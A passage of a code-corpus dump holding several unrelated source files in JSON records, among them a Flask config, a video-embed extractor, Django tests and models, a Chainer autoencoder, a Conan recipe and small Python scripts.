label=dir_path)\nplt.legend()\nplt.show()\n","sub_path":"icra2021/base/plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"316404966","text":"# 端口\nSERVER_PORT = '9000'\n# 开启debug模式\nDEBUG = True\n# 显示sql语句\nSQLALCHEMY_ECHO = True\n\nSQLALCHEMY_DATABASE_URI = 'mysql+pymysql://root:123456@127.0.0.1:3306/movie'\nSQLALCHEMY_TRACK_MODIFICATIONS = False\n\n# 数据库编码 utf-8\nSQLALCHEMY_ENCODING = \"utf-8\"\n","sub_path":"order/config/local_setting.py","file_name":"local_setting.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"42526367","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom ..util.html import get_content, get_location\nfrom ..util.match import matchall, match1\nfrom ..embedextractor import EmbedExtractor\n\nimport json\n\n\"\"\"\nrefer to http://open.youku.com/tools\n\"\"\"\nyouku_embed_patterns = [ 'youku\\.com/v_show/id_([a-zA-Z0-9=]+)',\n 'player\\.youku\\.com/player\\.php/sid/([a-zA-Z0-9=]+)/v\\.swf',\n 'loader\\.swf\\?VideoIDS=([a-zA-Z0-9=]+)',\n 'player\\.youku\\.com/embed/([a-zA-Z0-9=]+)',\n 'YKU.Player\\(\\'[a-zA-Z0-9]+\\',{ client_id: \\'[a-zA-Z0-9]+\\', vid: \\'([a-zA-Z0-9]+)\\'',\n 'data-youku=\\\"[a-zA-Z0-9,:]+vid:([a-zA-Z0-9=]+)\\\"'\n ]\n\n\"\"\"\nv.qq.com\n\"\"\"\nqq_embed_patterns = [ 'v\\.qq\\.com[a-zA-Z0-9\\/\\?\\.\\;]+vid=([a-zA-Z0-9]+)',\n 'TPout\\.swf[a-zA-Z0-9=\\?\\&_]+vid=([a-zA-Z0-9]+)'\n ]\n\n\n\"\"\"\ntv.sohu.com\n\"\"\"\nsohu_embed_patterns = [ 'tv\\.sohu\\.com[a-zA-Z0-9\\/\\?=]+\\&vid=([a-zA-Z0-9]+)\\&',\n 'share\\.vrs\\.sohu\\.com\\/my\\/v.swf[&+=a-zA-z0-9]+&id=([^&]+)',\n 'my\\.tv\\.sohu\\.com\\/[a-zA-Z0-9\\/]+/([^\\.]+)'\n ]\n\n\"\"\"\nKu6\n\"\"\"\nku6_embed_url = [ '(http://v.ku6vms.com/[^\\\"]+)'\n ]\n\nku6_embed_patterns = [ 'http://player.ku6.com/refer/(.*)/v.swf'\n ]\n\"\"\"\n163\n\"\"\"\nnetease_embed_patterns = [ 'v\\.163\\.com\\/[0-9a-zA-Z\\/\\?\\.]+topicid=([^&]+)&\\;vid=([^&]+)',\n 'topicid=([a-zA-Z0-9]+)&vid=([a-zA-Z0-9]+)&'\n ]\n\n\"\"\"\niqiyi\n\"\"\"\niqiyi_embed_patterns = [ 'definitionID=([^&]+)&tvId=([^&]+)'\n ]\n\n\"\"\"\nLetv Cloud\n\"\"\"\nlecloud_embed_patterns = [ '{\"uu\":\"([^\\\"]+)\",\"vu\":\"([^\\\"]+)\"',\n 'bcloud.swf\\?uu=([^&]+)&vu=([^&]+)',\n 'uu=([^&]+)&vu=([^&]+)'\n ]\n\n\"\"\"\nifeng\n\"\"\"\nifeng_embed_patterns = [ 'v\\.ifeng\\.com\\/[a-zA-Z\\=\\/\\?\\&\\.]+guid=([^\\\"]+)'\n ]\n\n\"\"\"\nweibo\n\"\"\"\nweibo_embed_patterns = [ 'http://video.weibo.com/player/1034:(\\w{32})\\w*'\n ]\n\n\"\"\"\nSina\n\"\"\"\nsina_embed_patterns = [ 'http://video.sina.com.cn/share/video/(\\d+).swf'\n ]\n\n\"\"\"\nDilidili\n\"\"\"\ndilidili_embed_patterns = [ 'vid=([^&]+)&v=([^&]+)&'\n ]\n\n\"\"\"\nBilibili\n\"\"\"\nbilibili_embed_patterns = [ 'flashvars=\"aid=(\\d+)'\n ]\n\nclass GeneralEmbed(EmbedExtractor):\n name = u\"GeneralEmbed (通用嵌入视频)\"\n\n def prepare_playlist(self):\n content = get_content(self.url)\n\n vids = matchall(content, youku_embed_patterns)\n for vid in vids:\n self.video_info_list.append(('youku',vid))\n\n vids = matchall(content, qq_embed_patterns)\n for vid in vids:\n self.video_info_list.append(('qq.video',vid))\n\n vids = matchall(content, sohu_embed_patterns)\n for vid in vids:\n self.video_info_list.append(('sohu.my',vid))\n\n urls = matchall(content, ku6_embed_url)\n for url in urls:\n html = get_content(url)\n flashvars = matchall(html, ['vid=([^&]+)', 'style=([^&]+)', 'sn=([^&]+)'])\n data = json.loads(get_content('http://v.ku6vms.com/phpvms/player/forplayer/vid/{}/style/{}/sn/{}'.format(flashvars[0], flashvars[1],flashvars[2])))\n vid = data['ku6vid']\n self.video_info_list.append(('ku6',vid))\n vids = matchall(content, ku6_embed_patterns)\n for v in vids:\n self.video_info_list.append(('ku6', v))\n vids = matchall(content, netease_embed_patterns)\n for v in vids:\n self.video_info_list.append(('netease.video', v))\n\n vids = matchall(content, iqiyi_embed_patterns)\n for v in vids:\n videoid, tvid = v\n self.video_info_list.append(('iqiyi', (tvid, videoid)))\n\n vids = matchall(content, lecloud_embed_patterns)\n for v in vids:\n uu, vu = v\n self.video_info_list.append(('le.letvcloud', (vu, uu)))\n\n vids = matchall(content, ifeng_embed_patterns)\n for v in vids:\n v = v.split('&')[0]\n self.video_info_list.append(('ifeng.news', v))\n\n vids = matchall(content, weibo_embed_patterns)\n for v in vids:\n self.video_info_list.append(('weibo','http://weibo.com/p/' + v))\n\n vids = matchall(content, sina_embed_patterns)\n for v in vids:\n v = v.split('&')[0]\n self.video_info_list.append(('sina.video', v))\n\n vids = matchall(content, bilibili_embed_patterns)\n for v in vids:\n v = \"http://www.bilibili.com/video/av{}\".format(v)\n self.video_info_list.append(('bilibili.video', v))\n\n\n vids = matchall(content, dilidili_embed_patterns)\n for v in vids:\n v,site = v\n if site == 'bilibili':\n site = 'bilibili.video'\n elif site == 'qq':\n site = 'qq.video'\n elif site =='yun':\n site = 'le.letvcloud'\n v = v.split(':')\n self.video_info_list.append((site, v))\n\n tmp = []\n for v in self.video_info_list:\n if not v in tmp:\n tmp.append(v)\n self.video_info_list = tmp\n\n parser = EmbedExtractor.parser_list\n\nsite = GeneralEmbed()\n","sub_path":"ykdl/extractors/generalembed.py","file_name":"generalembed.py","file_ext":"py","file_size_in_byte":5386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"49475905","text":"import datetime as dt\nfrom django.test import TestCase\n\nfrom classes.forms import ClassForm, LineOfBusinessForm, REQUIRED_ERROR\nfrom classes.models import Class, LineOfBusiness\n\n\nclass ClassFormTest(TestCase):\n\n def test_class_form_has_correct_prefix(self):\n form = ClassForm()\n self.assertEqual(form.prefix, 'class')\n\n def test_start_date_input_has_placeholder_and_css_classes(self):\n form = ClassForm()\n self.assertIn(\n 'placeholder=\"Select or enter the start date\"',\n form.as_p()\n )\n self.assertIn('class=\"form-control datepicker\"', form.as_p())\n\n def test_line_of_business_input_has_placeholder_and_css_classes(self):\n form = ClassForm()\n self.assertIn(\n 'placeholder=\"Select a Line Of Business (LOB)\"',\n form.as_p()\n )\n self.assertIn('class=\"form-control dropdown\"', form.as_p())\n\n def test_shift_input_has_placeholder_and_css_classes(self):\n form = ClassForm()\n self.assertIn(\n 'placeholder=\"Class shift\"',\n form.as_p()\n )\n self.assertIn('class=\"form-control\"', form.as_p())\n\n def test_hiring_bonus_input_has_placeholder_and_css_classes(self):\n form = ClassForm()\n self.assertIn(\n 'placeholder=\"Enter Hiring Bonus (in USD)\"',\n form.as_p()\n )\n self.assertIn('class=\"form-control\"', form.as_p())\n\n def test_referral_bonus_input_has_placeholder_and_css_classes(self):\n form = ClassForm()\n self.assertIn(\n 'placeholder=\"Enter Referral Bonus (in USD)\"',\n form.as_p()\n )\n self.assertIn('class=\"form-control\"', form.as_p())\n\n def test_start_date_input_validation_for_blank_entries(self):\n lob = LineOfBusiness.objects.create(name='PyPi')\n form = ClassForm(data={\n 'start_date': '',\n 'line_of_business': lob,\n 'shift': 1,\n 'hiring_bonus': 100,\n 'referral_bonus': 100,\n })\n self.assertFalse(form.is_valid())\n self.assertEqual(\n form.errors['start_date'],\n [REQUIRED_ERROR]\n )\n\n def test_line_of_business_input_validation_for_blank_entries(self):\n form = ClassForm(data={\n 'start_date': dt.date(2017, 7, 2),\n 'line_of_business': '',\n 'shift': 1,\n 'hiring_bonus': 100,\n 'referral_bonus': 100,\n })\n self.assertFalse(form.is_valid())\n self.assertEqual(\n form.errors['line_of_business'],\n [REQUIRED_ERROR]\n )\n\n def test_hiring_bonus_input_validation_for_blank_entries(self):\n lob = LineOfBusiness.objects.create(name='PyPi')\n form = ClassForm(data={\n 'start_date': dt.date(2017, 7, 2),\n 'line_of_business': lob,\n 'shift': 1,\n 'hiring_bonus': '',\n 'referral_bonus': 100,\n })\n self.assertFalse(form.is_valid())\n self.assertEqual(\n form.errors['hiring_bonus'],\n [REQUIRED_ERROR]\n )\n\n def test_referral_bonus_input_validation_for_blank_entries(self):\n lob = LineOfBusiness.objects.create(name='PyPi')\n form = ClassForm(data={\n 'start_date': dt.date(2017, 7, 2),\n 'line_of_business': lob,\n 'shift': 1,\n 'hiring_bonus': 100,\n 'referral_bonus': '',\n })\n self.assertFalse(form.is_valid())\n self.assertEqual(\n form.errors['referral_bonus'],\n [REQUIRED_ERROR]\n )\n\n def test_form_save(self):\n lob = LineOfBusiness.objects.create(name='iPython')\n form = ClassForm(data={\n 'start_date': ['06/20/2017'],\n 'line_of_business': lob,\n 'shift': 1,\n 'hiring_bonus': 150,\n 'referral_bonus': 300,\n })\n if not form.is_valid():\n print(form.errors)\n # self.assertTrue(form.is_valid())\n new_class = form.save()\n self.assertEqual(new_class, Class.objects.all()[0])\n\n\nclass LineOfBusinessFormTest(TestCase):\n\n def test_name_input_has_correct_placeholder(self):\n form = LineOfBusinessForm()\n self.assertIn(\n 'placeholder=\"Enter Line Of Business short name\"',\n form.as_p()\n )\n \n def test_name_input_has_correct_class(self):\n form = LineOfBusinessForm()\n self.assertIn(\n 'class=\"form-control col-sm-5\"',\n form.as_p()\n )","sub_path":"classes/tests/test_forms.py","file_name":"test_forms.py","file_ext":"py","file_size_in_byte":4556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"212730474","text":"import chainer, numpy\nfrom matplotlib import pyplot\n\nclass mychain(chainer.Chain):\n def __init__(self, i, l, o):\n super(mychain, self).__init__()\n with self.init_scope():\n self.l1 = chainer.links.Linear(i,l)\n self.l2 = chainer.links.Linear(l,o)\n \n def __call__(self, x, y=None, train=True):\n x, y = chainer.Variable(x), chainer.Variable(y)\n\n a = chainer.functions.relu(self.l1(x))\n b = chainer.functions.relu(self.l2(a))\n if train:\n return chainer.functions.mean_squared_error(b, y)\n else:\n return b.data\n\ndef main():\n mnist = chainer.datasets.get_mnist()\n train, test = mnist\n\n model = mychain(28*28, 28*28*4, 28*28)\n\n opt = chainer.optimizers.Adam()\n opt.setup(model)\n\n epoch = 500\n batch = 20\n\n #train 1 \n def rand_train(a):\n return a[numpy.random.randint(len(a))][0].reshape(-1,len(a[0][0]))\n\n import time\n\n t0 = time.time()\n\n for i in range(epoch):\n loss = 0\n for n in range(batch):\n pix = rand_train(train)\n loss += model(pix, pix)\n print('epoch: {}, loss: {}'.format(i, loss.data))\n\n model.cleargrads()\n loss.backward()\n opt.update()\n \n #print-out train time\n t1 = time.time()\n print(t1-t0)\n\n #save for train 1\n try:\n chainer.serializers.save_npz('mymodel.npz', model)\n except:\n pritn('save error')\n \n # result for train 1\n pix = train[0][0].reshape(-1,len(train[0][0]))\n #or train[0][0][:, numpy.newaxis].T\n res = model(pix, train=False)\n\n pyplot.imshow(\n numpy.reshape(train[0][0], (28, 28)),\n cmap='gray')\n pyplot.show()\n pyplot.imshow(numpy.reshape(res, (28, 28)), cmap='gray')\n pyplot.show()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"152407004","text":"import random\nfrom race import races, Race\nfrom charclass import classes, CharacterClass\nfrom armor import armors, Armor\nfrom weapon import weapons, Weapon\nimport binascii\n\n_character_id = 0\nclass Character(object):\n\tfields = 'name:str race_name:str class_name:str var_str:int var_dex:int var_con:int var_int:int armor:armor weapon:weapon'\n\tdef __init__(self, name, race_name, class_name, str = 0, dex = 0, con = 0, int = 0, armor = None, weapon = None):\n\t\tself.name = name\n\n\t\tself.race_name = race_name\n\t\tself.class_name = class_name\n\n\t\tself.var_str = str\n\t\tself.var_dex = dex\n\t\tself.var_con = con\n\t\tself.var_int = int\n\n\t\tself.per_wc_miss_chance = {}\n\n\t\tself.armor = armor\n\t\tself.weapon = weapon\n\n\trace = property(lambda self: races[self.race_name])\n\tclass_ = property(lambda self: classes[self.class_name])\n\n\tstr = property(lambda self: 1 + self.race.base_str + self.var_str)\n\tdex = property(lambda self: 1 + self.race.base_dex + self.var_dex)\n\tcon = property(lambda self: 1 + self.race.base_con + self.var_con)\n\tint = property(lambda self: 1 + self.race.base_int + self.var_int)\n\n\tmax_hp = property(lambda self: self.con * self.class_.hp_per_con)\n\tmax_sp = property(lambda self: self.int)\n\tmax_mp = property(lambda self: self.dex)\n\n\t@classmethod\n\tdef random(cls):\n\t\tglobal _character_id\n\t\tname = 'character%d' % _character_id\n\t\t_character_id += 1\n\t\trace_name = random.choice(races.keys())\n\t\tclass_name = random.choice(classes.keys())\n\t\trndstats = [random.choice(['dex', 'con', 'int', 'str']) for i in range(random.randrange(4, 6+1))]\n\t\tstr = rndstats.count('str')\n\t\tdex = rndstats.count('dex')\n\t\tcon = rndstats.count('con')\n\t\tint = rndstats.count('int')\n\t\tarmor = random.choice(armors.values())#Armor.random()\n\t\tweapon = random.choice(weapons.values())#Weapon.random()\n\t\treturn cls(name, race_name, class_name, str, dex, con, int, armor, weapon)\n\n","sub_path":"src/character.py","file_name":"character.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"463933037","text":"import os\nimport sys\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '../varity')))\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '../varity/common')))\n\nimport varity\nimport cfg\nimport random\nimport shutil\nimport socket\nimport json\n\ndef configure():\n cfg.MAX_EXPRESSION_SIZE = 5\n cfg.MAX_NESTING_LEVELS = 3\n cfg.MAX_LINES_IN_BLOCK = 3\n cfg.ARRAY_SIZE = 10\n cfg.MAX_SAME_LEVEL_BLOCKS = 2\n cfg.MATH_FUNC_ALLOWED = True\n cfg.NUM_GROUPS = 1\n cfg.TESTS_PER_GROUP = 5\n cfg.OPT_LEVELS = [(\"-O0\", 1), (\"-O0\", 0), (\"-O1\", 0), (\"-O2\", 0), (\"-O3\", 0)]\n cfg.TESTS_DIR = \"_tests\"\n cfg.INPUT_SAMPLES_PER_RUN = 5\n cfg.REAL_TYPE = \"double\"\n\n # Set machine C compiler\n cc_path = findCCompiler()\n cfg.COMPILERS = [(\"cc\", cc_path)]\n\ndef findCCompiler():\n cc_path = shutil.which('cc')\n assert cc_path != None\n #print('cc:', cc_path)\n return cc_path\n\ndef test_driver():\n configure()\n varity.generateTests()\n print('dir:', varity.dirName())\n # Directory is generated\n assert os.path.exists(\"./\"+varity.dirName())\n\n # Check C files are generated\n c_files = 0\n for dirpath, dirnames, filenames in os.walk(\".\"):\n for filename in [f for f in filenames if f.endswith(\".c\")]:\n c_files = c_files + 1\n assert c_files == cfg.TESTS_PER_GROUP*cfg.NUM_GROUPS\n\n # Check C files are compiled\n varity.compileTests(\"./\"+varity.dirName())\n compiled_files = 0\n for dirpath, dirnames, filenames in os.walk(\".\"):\n for filename in [f for f in filenames if f.endswith(\".exe\")]:\n compiled_files = compiled_files + 1\n assert compiled_files > cfg.TESTS_PER_GROUP*cfg.NUM_GROUPS\n\n # Check executables can be run\n cwd = os.getcwd()\n varity.runTests(\"./\"+varity.dirName())\n resultsFile = cwd + \"/\" + varity.dirName() + \"/results.json\"\n with open(resultsFile) as json_file:\n data = json.load(json_file)\n testName = list(data.keys())[0]\n assert testName.endswith(\".c\")\n\n # Remove dir\n shutil.rmtree(cwd + \"/\" + varity.dirName())\n assert not os.path.exists(\"./\"+varity.dirName())\n\nif __name__ == '__main__':\n test_driver()\n\n","sub_path":"tests/test_driver.py","file_name":"test_driver.py","file_ext":"py","file_size_in_byte":2202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"84627440","text":"from django.db import models\nfrom django.core.exceptions import ValidationError\n\nfrom edc.audit.audit_trail import AuditTrail\nfrom edc.choices import YES_NO, YES_NO_DONT_KNOW\nfrom edc.device.dispatch.models import BaseDispatchSyncUuidModel\n\nfrom apps.bcpp_household.managers import HouseholdAssessmentManager\nfrom apps.bcpp_household.exceptions import AlreadyReplaced\n\nfrom ..choices import INELIGIBLE_REASON, RESIDENT_LAST_SEEN\n\nfrom .household_structure import HouseholdStructure\nfrom .plot import Plot\n\n\nclass HouseholdAssessment(BaseDispatchSyncUuidModel):\n\n household_structure = models.OneToOneField(HouseholdStructure)\n\n residency = models.CharField(\n verbose_name=('Does anyone ever stay in this household?'),\n choices=YES_NO,\n max_length=25,\n null=True,\n editable=True,\n )\n\n member_count = models.IntegerField(\n verbose_name=(\"How many people live in this household (estimate)?\"),\n null=True,\n blank=True,\n help_text=(\"Provide the number of members in this household.\"))\n\n eligibles = models.CharField(\n verbose_name=('In speaking with the individual(s) above, at '\n 'least one member of this plot is potentially eligible'),\n choices=YES_NO_DONT_KNOW,\n max_length=25,\n null=True,\n blank=True,\n editable=True,\n )\n\n ineligible_reason = models.CharField(\n verbose_name=('If no members are eligible for this study, please state '\n 'the reason for ineligility.'),\n null=True,\n max_length=25,\n choices=INELIGIBLE_REASON,\n editable=True,\n blank=True)\n\n last_seen_home = models.CharField(\n verbose_name=('When was a resident last seen in this household?'),\n choices=RESIDENT_LAST_SEEN,\n max_length=25,\n null=True,\n blank=True,\n editable=True,\n )\n\n def __unicode__(self):\n return unicode(self.household_structure)\n\n objects = HouseholdAssessmentManager()\n\n history = AuditTrail()\n\n def save(self, *args, **kwargs):\n if self.household_structure.household.replaced_by:\n raise AlreadyReplaced('Model {0}-{1} has its container replaced.'.format(\n self._meta.object_name, self.pk))\n if self.household_structure.enumerated:\n raise ValidationError('HouseholdStructure has been enumerated')\n if self.household_structure.failed_enumeration_attempts < 3:\n raise ValidationError('Three attempts are required before Household Assessment')\n super(HouseholdAssessment, self).save(*args, **kwargs)\n\n def natural_key(self):\n return self.household_structure.natural_key()\n natural_key.dependencies = ['bcpp_household.household_structure']\n\n def dispatch_container_lookup(self, using=None):\n return (Plot, 'household_structure__household__plot__plot_identifier')\n\n @property\n def vdc_househould_status(self):\n return self.last_seen_home\n\n class Meta:\n app_label = 'bcpp_household'\n verbose_name = 'Household Residency Status Assess'\n verbose_name_plural = 'Household Residency Status Assess'\n","sub_path":"apps/bcpp_household/models/household_assessment.py","file_name":"household_assessment.py","file_ext":"py","file_size_in_byte":3199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"350199694","text":"import os\nimport functools\nfrom conans import ConanFile, CMake, tools\n\nrequired_conan_version = \">=1.33.0\"\n\n\nclass InnoextractConan(ConanFile):\n name = \"innoextract\"\n description = \"Extract contents of Inno Setup installers\"\n license = \"innoextract License\"\n topics = (\"inno-setup\", \"decompression\")\n homepage = \"https://constexpr.org/innoextract/\"\n url = \"https://github.com/conan-io/conan-center-index\"\n exports_sources = [\"CMakeLists.txt\", \"patches/*\"]\n requires = (\n \"boost/1.78.0\",\n \"xz_utils/5.2.5\",\n \"libiconv/1.16\"\n )\n generators = \"cmake\", \"cmake_find_package\"\n settings = \"os\", \"arch\", \"compiler\", \"build_type\"\n\n @property\n def _source_subfolder(self):\n return \"source_subfolder\"\n\n @property\n def _build_subfolder(self):\n return \"build_subfolder\"\n\n def source(self):\n tools.get(**self.conan_data[\"sources\"][self.version], strip_root=True,\n destination=self._source_subfolder)\n\n def build(self):\n for patch in self.conan_data.get(\"patches\", {}).get(self.version, []):\n tools.patch(**patch)\n os.remove(os.path.join(self._source_subfolder, 'cmake', 'FindLZMA.cmake'))\n os.remove(os.path.join(self._source_subfolder, 'cmake', 'Findiconv.cmake'))\n cmake = self._configure_cmake()\n cmake.build()\n\n @functools.lru_cache(1)\n def _configure_cmake(self):\n cmake = CMake(self)\n # Turn off static library detection, which is on by default on Windows.\n # This keeps the CMakeLists.txt from trying to detect static Boost\n # libraries and use Boost components for zlib and BZip2. Getting the\n # libraries via Conan does the correct thing without other assistance.\n cmake.definitions[\"USE_STATIC_LIBS\"] = False\n cmake.configure(build_folder=self._build_subfolder)\n return cmake\n\n def package(self):\n self.copy(\"LICENSE\", dst=\"licenses\", src=self._source_subfolder)\n cmake = self._configure_cmake()\n cmake.install()\n tools.rmdir(os.path.join(self.package_folder, \"share\"))\n\n def package_id(self):\n del self.info.settings.compiler\n self.info.requires.clear()\n\n def package_info(self):\n self.cpp_info.libdirs = []\n bindir = os.path.join(self.package_folder, \"bin\")\n self.output.info(\"Appending PATH environment variable: {}\"\n .format(bindir))\n self.env_info.PATH.append(bindir)\n","sub_path":"recipes/innoextract/all/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":2490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"438877414","text":"#######Implementation of totogram.py#################\n####Step1:Find the total number of nodes for the given height,function num_nodes() is implemented to compute this#######\n####step2:call on function medians() to compute median and it creates a list which as all the medians#########\n####step3:function leveltree() is called to build a balanced binary tree with an exception at level two which has three nodes####\n####step4:diff() is called to find the maximum difference in built tree########\n####step5:loop is constructed which call the function optimize() to reorders the tree to reduce the maximum difference found so far####\n####step6:loop terminates if no more optimization could be made with the tree constructed#######\n####Result Analysis######\n####k=3 solution obtained 3####\n####k=4 solution obtained 5####\n####k=5 solution obtained 11####\n####k=6 solution obtained 23####\n####k=7 solution obtained 47####\n###################End################################# \nimport statistics\nimport sys\nh=int(sys.argv[1])\nmaximum=0\nclass Tree(object): ######tree nodes are of class type TREE######\n\tdef __init__(self,data):\n\t\tself.left = None\n\t\tself.right = None\n\t\tself.middle=None\n\t\tself.data = data\ndef num_nodes(h): ####### Function to return number of nodes for given height######\n\tsum=0\n\tpnode=0\n\tfor i in range(1,h+1):\n\t\tif i ==1:\n\t\t\tsum=1\n\t\telif i==2:\n\t\t\tsum+=3\n\t\t\tpnode=3\n\t\telse:\n\t\t\tsum=sum+(pnode*2)\n\t\t\tpnode=pnode*2\n\treturn sum\ntemp={}\nqueue=[]\ntnode=Tree(0)\ndef chunks(l, n):#######find the element for each level of tree######\n\tn = max(1, n)\n\treturn [l[i:i + n] for i in range(0, len(l), n)]\ndef medians(mylist,num):\n\ttemp=chunks(mylist,int(len(mylist)/num))\n\tfor i in range(0,num):\n\t\tmedian=int(statistics.median(temp[i]))\n\t\tqueue.append(median)\n\t\tmylist.remove(median)\nnode=Tree(0)\ndef leveltree(node):\n\tfor i in range (1,h+1):\n\t\tif i==1:\n\t\t\ttemp=queue[0:1]\n\t\t\tnode=maketree(node,temp,i,0)\n\t\t\tn=1\n\t\telif i==2:\n\t\t\ttemp=queue[n:n+3]\n\t\t\tmaketree(node,temp,i,0)\n\t\t\tn=n+3\n\t\t\tp=3\n\t\telse:\n\t\t\ttemp=queue[n:n+p*2]\n\t\t\tmaketree(node,temp,i,0)\n\t\t\tn=n+p*2\n\t\t\tp=p*2\n\treturn node\ndef maketree(self,temp,i,bool):######builds a level balanced binary tree with 3 nodes in second level and two nodes each###### \n\tbool=bool+1\n\tif i==1:\n\t\tself=Tree(0)\n\t\tself.data=temp.pop(0)\n\t\treturn self\n\telse :\n\t\tself.left=maketree(self.left,temp,i-1,bool)\n\t\tif(bool==1):\n\t\t\tself.middle=maketree(self.middle,temp,i-1,bool)\n\t\tself.right=maketree(self.right,temp,i-1,bool)\n\t\treturn self\n\na=[]\t\t\ndef lprintTree(tree,bool):######prints the tree in level based order on finding the result######\n\t\tif tree==None:\n\t\t\treturn\n\t\tif bool==1:\n\t\t\ta.append(tree.data)\n\t\tif tree != None:\n\t\t\tlprintTree(tree.left,bool-1)\n\t\t\tif tree.middle != None:\n\t\t\t\tlprintTree(tree.middle,bool-1)\n\t\t\tlprintTree(tree.right,bool-1)\ndef diff(self,i,bool):######Function find the difference#######\n\tglobal maximum\n\tglobal tnode\n\tbool=bool+1\n\tif self.left == None and self.right ==None:\n\t\treturn self\n\telse :\n\t\tl=self.left.data\n\t\tself.left=diff(self.left,i-1,bool)\n\t\tif(bool==1):\n\t\t\tself.middle=diff(self.middle,i-1,bool)\n\t\tr=self.right.data\n\t\tself.right=diff(self.right,i-1,bool)\n\t\tdifference=max(abs(self.data-l),abs(self.data-r))\n\t\tif maximum < difference:\n\t\t\tif( self != None):\n\t\t\t\ttnode=self\n\t\t\t\tmaximum=difference\n\treturn self\t\nmini=999\t\nmp=Tree(0)\ndef min(tnode,parent):######Helper function to reorder the tree,returns the address of parent node having child with minimum value#######\n\tglobal mini\n\tglobal mp\n\tif(tnode==None):\n\t\treturn\n\tif(mini>tnode.data):\n\t\tmini=tnode.data\n\t\tmp=parent\n\tmin(tnode.left,tnode)\n\tmin(tnode.right,tnode)\n\treturn mp\nmx=-999\t\ndef maxi(tnode,parent):######Helper function to reorder the tree, returns the address of parent node having child with maximum value######\n\tglobal mx\n\tglobal mp\n\tif(tnode==None):\n\t\treturn\n\tif(mxtemp.data):\n\t\t\tt=tnode.left.data\n\t\t\ttnode.left.data=temp.left.data\n\t\t\ttemp.left.data=t\n\t\tif(temp.right.data>temp.data):\n\t\t\tt=tnode.left.data\n\t\t\ttnode.left.data=temp.right.data\n\t\t\ttemp.right.data=t\t\nmylist=[i for i in range(1,num_nodes(h)+1)]\nfor height in range(0,h):########call to build the initial tree######\n\tif height==0:\n\t\tmedians(mylist,1)\n\telif height==1:\n\t\tmedians(mylist,3)\n\t\tparent=3\n\telif height >1:\n\t\tmedians(mylist,parent*2)\n\t\tparent=parent*2\nnode=leveltree(node)\ns=diff(node,h,0)\nmaximum1=999\nwhile(maximummaximum):\n\t\tmaximum1=maximum\n\t\ta=list()\n\t\tfor i in range(1,h+1):\n\t\t\tlprintTree(node,i)\n\tmaximum=0\t\n\tdiff(node,h,0)\t\nprint(maximum)#######returns our result i.e maximum of all the differences in the tree#######\nprint(a)######3retiurns the level based order of the tree#######\n\n ","sub_path":"totogram.py","file_name":"totogram.py","file_ext":"py","file_size_in_byte":5291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"45946697","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.stats import norm\nimport math\nimport matplotlib.colors as colors\n\nfrom matplotlib import cm\nfrom matplotlib import rc\n\n__author__ = 'ernesto'\n\n# if use latex or mathtext\nrc('text', usetex=True)\nrc('mathtext', fontset='cm')\n\n# auxiliar function for plot ticks of equal length in x and y axis despite its scales.\ndef convert_display_to_data_coordinates(transData, length=10):\n # create a transform which will take from display to data coordinates\n inv = transData.inverted()\n # transform from display coordinates to data coordinates in x axis\n data_coords = inv.transform([(0, 0), (length, 0)])\n # get the length of the segment in data units\n yticks_len = data_coords[1, 0] - data_coords[0, 0]\n # transform from display coordinates to data coordinates in y axis\n data_coords = inv.transform([(0, 0), (0, length)])\n # get the length of the segment in data units\n xticks_len = data_coords[1, 1] - data_coords[0, 1]\n return xticks_len, yticks_len\n\n\n#####################################\n# PARAMETERS - This can be modified #\n#####################################\n\n# normal pdf variances\nvar1 = 0.5\nvar2 = 2\nvar_std = 1\n# normal pdf mean\ntheta = 6\nepsilon = 1.5\n\n# maximum deviation from the mean where to plot each gaussian\nmax_mean_dev = 3.1 * var2\n\n#####################\n# END OF PARAMETERS #\n#####################\n\n# abscissa values\nxmin = theta - max_mean_dev\nxmax = theta + max_mean_dev\n\nx = np.linspace(xmin, xmax, 300)\n# normal distribution and density values in x\npdf_var1 = norm.pdf(x, theta, math.sqrt(var1))\npdf_var2 = norm.pdf(x, theta, math.sqrt(var2))\npdf_std = norm.pdf(x, theta, math.sqrt(var_std))\n\n\n# axis parameters\ndx = xmax / 20\nxmin_ax = xmin - dx\nxmax_ax = xmax + dx\n\nym = np.amax(pdf_var1)\nymax_ax = ym + ym / 10\nymin_ax = -ym / 10\n\n# areas to fill limits\npdf1_xinf = np.linspace(xmin, theta-epsilon, 50)\npdf1_inf = norm.pdf(pdf1_xinf, theta, math.sqrt(var1))\npdf1_xsup = np.linspace(theta+epsilon, xmax, 50)\npdf1_sup = norm.pdf(pdf1_xsup, theta, math.sqrt(var1))\npdf2_xinf = np.linspace(xmin, theta-epsilon, 50)\npdf2_inf = norm.pdf(pdf2_xinf, theta, math.sqrt(var2))\npdf2_xsup = np.linspace(theta+epsilon, xmax, 50)\npdf2_sup = norm.pdf(pdf2_xsup, theta, math.sqrt(var2))\n\nepsilon1 = epsilon / math.sqrt(var1)\nepsilon2 = epsilon / math.sqrt(var2)\npdfstd1_xinf = np.linspace(xmin, theta-epsilon1, 50)\npdfstd1_inf = 